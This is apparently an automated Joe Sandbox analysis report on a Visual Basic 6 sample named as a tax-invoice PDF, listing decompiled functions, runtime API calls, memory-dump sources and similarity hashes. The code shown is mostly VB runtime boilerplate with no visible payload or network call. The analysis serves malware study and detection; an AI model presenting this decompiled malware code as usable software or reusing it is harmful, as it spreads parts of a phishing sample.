0x00417d14
0x00417d14
0x00417d26
0x00417d2d
0x00417d31
0x00417d32
0x00417d34
0x00417d3c
0x00417d42
0x00417d4b
0x00417d65
0x00417d4d
0x00417d4d
0x00417d52
0x00417d57
0x00417d5c
0x00417d5c
0x00417d71
0x00417d82
0x00417d85
0x00417d87
0x00417d8e
0x00417da7
0x00417d90
0x00417d90
0x00417d92
0x00417d97
0x00417d9a
0x00417d9d
0x00417da2
0x00417da2
0x00417dab
0x00417dae
0x00417db1
0x00417dbb
0x00417dbb
0x00417dc0
0x00417dc1
0x00417dee
0x00417df3

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00417C07
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00417C2C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417C59
__vbaChkstk.MSVBVM60(?,00000000), ref: 00417C72
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117D8,000001B0), ref: 00417CA9
__vbaFreeObj.MSVBVM60(00000000,?,004117D8,000001B0), ref: 00417CBA
#674.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00417CFF
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00417D04
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00417D34
__vbaNew2.MSVBVM60(00411788,0041A31C), ref: 00417D57
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,00000048), ref: 00417D9D
__vbaStrMove.MSVBVM60(00000000,?,00411778,00000048), ref: 00417DBB
__vbaFreeStr.MSVBVM60(00417DF4), ref: 00417DEE

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2$#674ListMove
String ID:
API String ID: 3214852864-0
Opcode ID: 3a13c1e48362ac22731a11d1b2216794c4df2ff3c8dca54457b698eb23d93e31
Instruction ID: 7ea2cf6f9ccf7470f1e3e6d195e2ea96098153044a4c4d09e17af646ef160cd8
Opcode Fuzzy Hash: 3a13c1e48362ac22731a11d1b2216794c4df2ff3c8dca54457b698eb23d93e31
Instruction Fuzzy Hash: 275117B094430CEFDB11DFA1C849BEEBBB9BF04704F20452AE505AB2A1D7795981CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00418071, Relevance: 15.1, APIs: 10, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00418071(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v72;
				signed int _v76;
				char* _t37;
				signed int _t41;
				intOrPtr _t60;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t60;
				_push(0x38);
				L004014B0();
				_v12 = _t60;
				_v8 = 0x4013f0;
				L00401684();
				L00401684();
				if( *0x41a010 != 0) {
					_v72 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v72 = 0x41a010;
				}
				_t37 =  &_v40;
				L0040169C();
				_v60 = _t37;
				_v48 = 0x80020004;
				_v56 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t41 =  *((intOrPtr*)( *_v60 + 0x12c))(_v60, 0x10, _t37,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x35c))( *_v72));
				asm("fclex");
				_v64 = _t41;
				if(_v64 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x12c);
					_push(0x4118b4);
					_push(_v60);
					_push(_v64);
					L00401690();
					_v76 = _t41;
				}
				L0040168A();
				_v36 = 0x114f9390;
				_v32 = 0x5b02;
				_push(0x418189);
				L0040165A();
				L0040165A();
				return _t41;
			}

0x00418076
0x00418081
0x00418082
0x00418089
0x0041808c
0x00418094
0x00418097
0x004180a4
0x004180af
0x004180bb
0x004180d5
0x004180bd
0x004180bd
0x004180c2
0x004180c7
0x004180cc
0x004180cc
0x004180f0
0x004180f4
0x004180f9
0x004180fc
0x00418103
0x0041810d
0x00418117
0x00418118
0x00418119
0x0041811a
0x00418123
0x00418129
0x0041812b
0x00418132
0x0041814e
0x00418134
0x00418134
0x00418139
0x0041813e
0x00418141
0x00418144
0x00418149
0x00418149
0x00418155
0x0041815a
0x00418161
0x00418168
0x0041817b
0x00418183
0x00418188

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 0041808C
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 004180A4
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 004180AF
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 004180C7
__vbaObjSet.MSVBVM60(?,00000000), ref: 004180F4
__vbaChkstk.MSVBVM60(?,00000000), ref: 0041810D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118B4,0000012C), ref: 00418144
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00418155
__vbaFreeStr.MSVBVM60(00418189,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 0041817B
__vbaFreeStr.MSVBVM60(00418189,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00418183

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$ChkstkCopy$CheckHresultNew2
String ID:
API String ID: 3000170971-0
Opcode ID: c491c2cb775cae807af17051084d68c218f528a3780167fd951c2f4304962767
Instruction ID: d930d624ad928727e8e913629e97e8190c20c6fda9d004d036d54c3ab739eefd
Opcode Fuzzy Hash: c491c2cb775cae807af17051084d68c218f528a3780167fd951c2f4304962767
Instruction Fuzzy Hash: CE313C71900208AFCB00EF95C98ABDEBBB5EF08718F20492EF501772A1CB796945CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004160DA, Relevance: 13.6, APIs: 9, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004160DA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				char _v32;
				void* _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				char* _t54;
				signed int _t57;
				char* _t61;
				signed int _t65;
				short _t66;
				void* _t78;
				void* _t80;
				intOrPtr _t81;

				_t81 = _t80 - 0xc;
				 *[fs:0x0] = _t81;
				L004014B0();
				_v16 = _t81;
				_v12 = 0x4012f0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4014b6, _t78);
				if( *0x41a010 != 0) {
					_v56 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v56 = 0x41a010;
				}
				_t54 =  &_v32;
				L0040169C();
				_v40 = _t54;
				_t57 =  *((intOrPtr*)( *_v40 + 0x128))(_v40, _t54,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x354))( *_v56));
				asm("fclex");
				_v44 = _t57;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x4118b4);
					_push(_v40);
					_push(_v44);
					L00401690();
					_v60 = _t57;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v64 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v64 = 0x41a010;
				}
				_t61 =  &_v32;
				L0040169C();
				_v40 = _t61;
				_t65 =  *((intOrPtr*)( *_v40 + 0xc8))(_v40,  &_v36, _t61,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x34c))( *_v64));
				asm("fclex");
				_v44 = _t65;
				if(_v44 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0xc8);
					_push(0x4118b4);
					_push(_v40);
					_push(_v44);
					L00401690();
					_v68 = _t65;
				}
				_t66 = _v36;
				_v28 = _t66;
				L0040168A();
				_push(0x416245);
				return _t66;
			}

0x004160dd
0x004160ec
0x004160f6
0x004160fe
0x00416101
0x00416108
0x00416117
0x00416121
0x0041613b
0x00416123
0x00416123
0x00416128
0x0041612d
0x00416132
0x00416132
0x00416156
0x0041615a
0x0041615f
0x0041616a
0x00416170
0x00416172
0x00416179
0x00416195
0x0041617b
0x0041617b
0x00416180
0x00416185
0x00416188
0x0041618b
0x00416190
0x00416190
0x0041619c
0x004161a8
0x004161c2
0x004161aa
0x004161aa
0x004161af
0x004161b4
0x004161b9
0x004161b9
0x004161dd
0x004161e1
0x004161e6
0x004161f5
0x004161fb
0x004161fd
0x00416204
0x00416220
0x00416206
0x00416206
0x0041620b
0x00416210
0x00416213
0x00416216
0x0041621b
0x0041621b
0x00416224
0x00416228
0x0041622f
0x00416234
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 004160F6
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 0041612D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041615A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118B4,00000128), ref: 0041618B
__vbaFreeObj.MSVBVM60 ref: 0041619C
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 004161B4
__vbaObjSet.MSVBVM60(?,00000000), ref: 004161E1
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118B4,000000C8), ref: 00416216
__vbaFreeObj.MSVBVM60 ref: 0041622F

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$CheckFreeHresultNew2$Chkstk
String ID:
API String ID: 3581712425-0
Opcode ID: 465a380e523ea1efd861062213172c2af958d3f49755d29cd72651dd07d94f5f
Instruction ID: 543d12b10bbeb5ed2606cb7014b61b4716b6ac0b6809376680a027964591ca70
Opcode Fuzzy Hash: 465a380e523ea1efd861062213172c2af958d3f49755d29cd72651dd07d94f5f
Instruction Fuzzy Hash: EA410870901208EFCB00DF94C989BDDBBF5BF08314F24486AF501BB2A1C77A9995DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00415A11, Relevance: 12.1, APIs: 8, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00415A11(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr* _v68;
				signed int _v72;
				char* _t34;
				signed int _t38;
				intOrPtr _t54;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t54;
				_push(0x34);
				L004014B0();
				_v12 = _t54;
				_v8 = 0x4012a8;
				L00401684();
				if( *0x41a010 != 0) {
					_v68 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v68 = 0x41a010;
				}
				_t34 =  &_v36;
				L0040169C();
				_v56 = _t34;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t38 =  *((intOrPtr*)( *_v56 + 0x188))(_v56, 0x10, _t34,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x338))( *_v68));
				asm("fclex");
				_v60 = _t38;
				if(_v60 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x188);
					_push(0x4117c8);
					_push(_v56);
					_push(_v60);
					L00401690();
					_v72 = _t38;
				}
				L0040168A();
				_v28 = 0xf6a2aca0;
				_v24 = 0x5afa;
				_push(0x415b16);
				L0040165A();
				return _t38;
			}

0x00415a16
0x00415a21
0x00415a22
0x00415a29
0x00415a2c
0x00415a34
0x00415a37
0x00415a44
0x00415a50
0x00415a6a
0x00415a52
0x00415a52
0x00415a57
0x00415a5c
0x00415a61
0x00415a61
0x00415a85
0x00415a89
0x00415a8e
0x00415a91
0x00415a98
0x00415aa2
0x00415aac
0x00415aad
0x00415aae
0x00415aaf
0x00415ab8
0x00415abe
0x00415ac0
0x00415ac7
0x00415ae3
0x00415ac9
0x00415ac9
0x00415ace
0x00415ad3
0x00415ad6
0x00415ad9
0x00415ade
0x00415ade
0x00415aea
0x00415aef
0x00415af6
0x00415afd
0x00415b10
0x00415b15

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00415A2C
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00415A44
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00415A5C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00415A89
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00415AA2
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117C8,00000188), ref: 00415AD9
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00415AEA
__vbaFreeStr.MSVBVM60(00415B16,?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00415B10

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$ChkstkFree$CheckCopyHresultNew2
String ID:
API String ID: 2888502551-0
Opcode ID: b6abdbf5e4b5295dc1dca6ed216a7e17c22b3dab79fa976879b6a9a913c8858a
Instruction ID: 1eac1a0fc96dbb483f49ccb8d08295622210260d12fe93ec2297c3293a7729a1
Opcode Fuzzy Hash: b6abdbf5e4b5295dc1dca6ed216a7e17c22b3dab79fa976879b6a9a913c8858a
Instruction Fuzzy Hash: C121F970941608EFCB10DF90D889BDEBBB9BF58714F20452AF5017B2A0CBB96941CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041850A, Relevance: 10.6, APIs: 7, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041850A(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v68;
				signed int _t44;
				signed int _t49;
				short _t50;
				intOrPtr _t61;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t61;
				_push(0x30);
				L004014B0();
				_v12 = _t61;
				_v8 = 0x401430;
				L00401684();
				if( *0x41a31c != 0) {
					_v60 = 0x41a31c;
				} else {
					_push(0x41a31c);
					_push(0x411788);
					L00401696();
					_v60 = 0x41a31c;
				}
				_v40 =  *_v60;
				_t44 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v32);
				asm("fclex");
				_v44 = _t44;
				if(_v44 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411778);
					_push(_v40);
					_push(_v44);
					L00401690();
					_v64 = _t44;
				}
				_v48 = _v32;
				_t49 =  *((intOrPtr*)( *_v48 + 0xc0))(_v48,  &_v36);
				asm("fclex");
				_v52 = _t49;
				if(_v52 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0xc0);
					_push(0x411900);
					_push(_v48);
					_push(_v52);
					L00401690();
					_v68 = _t49;
				}
				_t50 = _v36;
				_v24 = _t50;
				L0040168A();
				_push(0x418611);
				L0040165A();
				return _t50;
			}

0x0041850f
0x0041851a
0x0041851b
0x00418522
0x00418525
0x0041852d
0x00418530
0x0041853d
0x00418549
0x00418563
0x0041854b
0x0041854b
0x00418550
0x00418555
0x0041855a
0x0041855a
0x0041856f
0x0041857e
0x00418581
0x00418583
0x0041858a
0x004185a3
0x0041858c
0x0041858c
0x0041858e
0x00418593
0x00418596
0x00418599
0x0041859e
0x0041859e
0x004185aa
0x004185b9
0x004185bf
0x004185c1
0x004185c8
0x004185e4
0x004185ca
0x004185ca
0x004185cf
0x004185d4
0x004185d7
0x004185da
0x004185df
0x004185df
0x004185e8
0x004185ec
0x004185f3
0x004185f8
0x0041860b
0x00418610

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00418525
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 0041853D
__vbaNew2.MSVBVM60(00411788,0041A31C,?,?,?,?,004014B6), ref: 00418555
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,00000014,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 00418599
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411900,000000C0,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 004185DA
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 004185F3
__vbaFreeStr.MSVBVM60(00418611,?,?,?,?,?,?,?,?,?,?,?,?,?,004014B6), ref: 0041860B

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$CheckFreeHresult$ChkstkCopyNew2
String ID:
API String ID: 746201682-0
Opcode ID: 232de4658e10841a2a62897e3ed315ab38a75a8015422456aa8d4166eda43240
Instruction ID: 8734746e2480dca55128e0571d371f362ea8bd6e52b2526b7a18b5f1a8cf40ba
Opcode Fuzzy Hash: 232de4658e10841a2a62897e3ed315ab38a75a8015422456aa8d4166eda43240
Instruction Fuzzy Hash: 0931EF70900208EFCB00DF95CC89BEEBBB4FB08704F20452AF511B72A0DB7959958B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041471E, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0041471E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				long long _v36;
				char _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v60;
				signed int _v64;
				char* _t37;
				signed int _t40;
				void* _t51;
				void* _t53;
				intOrPtr _t54;

				_t54 = _t53 - 0xc;
				 *[fs:0x0] = _t54;
				L004014B0();
				_v16 = _t54;
				_v12 = 0x4011a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x28,  *[fs:0x0], 0x4014b6, _t51);
				L00401684();
				if( *0x41a010 != 0) {
					_v60 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v60 = 0x41a010;
				}
				_t37 =  &_v40;
				L0040169C();
				_v44 = _t37;
				_t40 =  *((intOrPtr*)( *_v44 + 0x1bc))(_v44, _t37,  *((intOrPtr*)( *((intOrPtr*)( *_v60)) + 0x340))( *_v60));
				asm("fclex");
				_v48 = _t40;
				if(_v48 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x1bc);
					_push(0x4117d8);
					_push(_v44);
					_push(_v48);
					L00401690();
					_v64 = _t40;
				}
				L0040168A();
				_v36 =  *0x4011a0;
				asm("wait");
				_push(0x414813);
				L0040165A();
				return _t40;
			}

0x00414721
0x00414730
0x0041473a
0x00414742
0x00414745
0x0041474c
0x0041475b
0x00414764
0x00414770
0x0041478a
0x00414772
0x00414772
0x00414777
0x0041477c
0x00414781
0x00414781
0x004147a5
0x004147a9
0x004147ae
0x004147b9
0x004147bf
0x004147c1
0x004147c8
0x004147e4
0x004147ca
0x004147ca
0x004147cf
0x004147d4
0x004147d7
0x004147da
0x004147df
0x004147df
0x004147eb
0x004147f6
0x004147f9
0x004147fa
0x0041480d
0x00414812

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 0041473A
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00414764
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 0041477C
__vbaObjSet.MSVBVM60(?,00000000), ref: 004147A9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117D8,000001BC), ref: 004147DA
__vbaFreeObj.MSVBVM60 ref: 004147EB
__vbaFreeStr.MSVBVM60(00414813), ref: 0041480D

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultNew2
String ID:
API String ID: 2810356740-0
Opcode ID: 93b9afcfdce017e2040d786124e0f5980498c13b3d1ced446c1c6cb97ca7cebd
Instruction ID: 951eb2d89677cc9ee5b0ec43c4f89b8560f6837d6ab564d3462f73f612755afb
Opcode Fuzzy Hash: 93b9afcfdce017e2040d786124e0f5980498c13b3d1ced446c1c6cb97ca7cebd
Instruction Fuzzy Hash: 2F21F974900208EFCB00EF95D889BDDBBB4BF49714F14856AF501B72A0CB795984CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00415DEA, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00415DEA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v56;
				signed int _v60;
				char* _t37;
				signed int _t40;
				void* _t51;
				void* _t53;
				intOrPtr _t54;

				_t54 = _t53 - 0xc;
				 *[fs:0x0] = _t54;
				L004014B0();
				_v16 = _t54;
				_v12 = 0x4012d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x4014b6, _t51);
				L00401684();
				if( *0x41a010 != 0) {
					_v56 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v56 = 0x41a010;
				}
				_t37 =  &_v36;
				L0040169C();
				_v40 = _t37;
				_t40 =  *((intOrPtr*)( *_v40 + 0x184))(_v40, _t37,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x308))( *_v56));
				asm("fclex");
				_v44 = _t40;
				if(_v44 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x184);
					_push(0x4117c8);
					_push(_v40);
					_push(_v44);
					L00401690();
					_v60 = _t40;
				}
				L0040168A();
				_v32 =  *0x4012c8;
				asm("wait");
				_push(0x415edf);
				L0040165A();
				return _t40;
			}

0x00415ded
0x00415dfc
0x00415e06
0x00415e0e
0x00415e11
0x00415e18
0x00415e27
0x00415e30
0x00415e3c
0x00415e56
0x00415e3e
0x00415e3e
0x00415e43
0x00415e48
0x00415e4d
0x00415e4d
0x00415e71
0x00415e75
0x00415e7a
0x00415e85
0x00415e8b
0x00415e8d
0x00415e94
0x00415eb0
0x00415e96
0x00415e96
0x00415e9b
0x00415ea0
0x00415ea3
0x00415ea6
0x00415eab
0x00415eab
0x00415eb7
0x00415ec2
0x00415ec5
0x00415ec6
0x00415ed9
0x00415ede

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00415E06
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00415E30
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00415E48
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415E75
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117C8,00000184), ref: 00415EA6
__vbaFreeObj.MSVBVM60 ref: 00415EB7
__vbaFreeStr.MSVBVM60(00415EDF), ref: 00415ED9

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckChkstkCopyHresultNew2
String ID:
API String ID: 2810356740-0
Opcode ID: b135a41b56b4701473d7f9037ede186b027b93fd0b5d250a9c37b59227280806
Instruction ID: 9636257f6b72555d55af90b03ed50b153c5b844bdb38d02662f6c1dd1f131144
Opcode Fuzzy Hash: b135a41b56b4701473d7f9037ede186b027b93fd0b5d250a9c37b59227280806
Instruction Fuzzy Hash: 80212774901208EFCB00EF94C989BDDBBB5BF48714F20446AF101B72A1CB799A81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00416F1D, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00416F1D(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				char _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v44;
				signed int _v48;
				char* _t27;
				signed int _t30;
				intOrPtr _t41;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(0x1c);
				L004014B0();
				_v12 = _t41;
				_v8 = 0x401360;
				if( *0x41a010 != 0) {
					_v44 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v44 = 0x41a010;
				}
				_t27 =  &_v28;
				L0040169C();
				_v32 = _t27;
				_t30 =  *((intOrPtr*)( *_v32 + 0x1d4))(_v32, _t27,  *((intOrPtr*)( *((intOrPtr*)( *_v44)) + 0x374))( *_v44));
				asm("fclex");
				_v36 = _t30;
				if(_v36 >= 0) {
					_v48 = _v48 & 0x00000000;
				} else {
					_push(0x1d4);
					_push(0x4117b8);
					_push(_v32);
					_push(_v36);
					L00401690();
					_v48 = _t30;
				}
				L0040168A();
				_v24 =  *0x401358;
				asm("wait");
				_push(0x416fec);
				return _t30;
			}

0x00416f22
0x00416f2d
0x00416f2e
0x00416f35
0x00416f38
0x00416f40
0x00416f43
0x00416f51
0x00416f6b
0x00416f53
0x00416f53
0x00416f58
0x00416f5d
0x00416f62
0x00416f62
0x00416f86
0x00416f8a
0x00416f8f
0x00416f9a
0x00416fa0
0x00416fa2
0x00416fa9
0x00416fc5
0x00416fab
0x00416fab
0x00416fb0
0x00416fb5
0x00416fb8
0x00416fbb
0x00416fc0
0x00416fc0
0x00416fcc
0x00416fd7
0x00416fda
0x00416fdb
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00416F38
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 00416F5D
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,004014B6), ref: 00416F8A
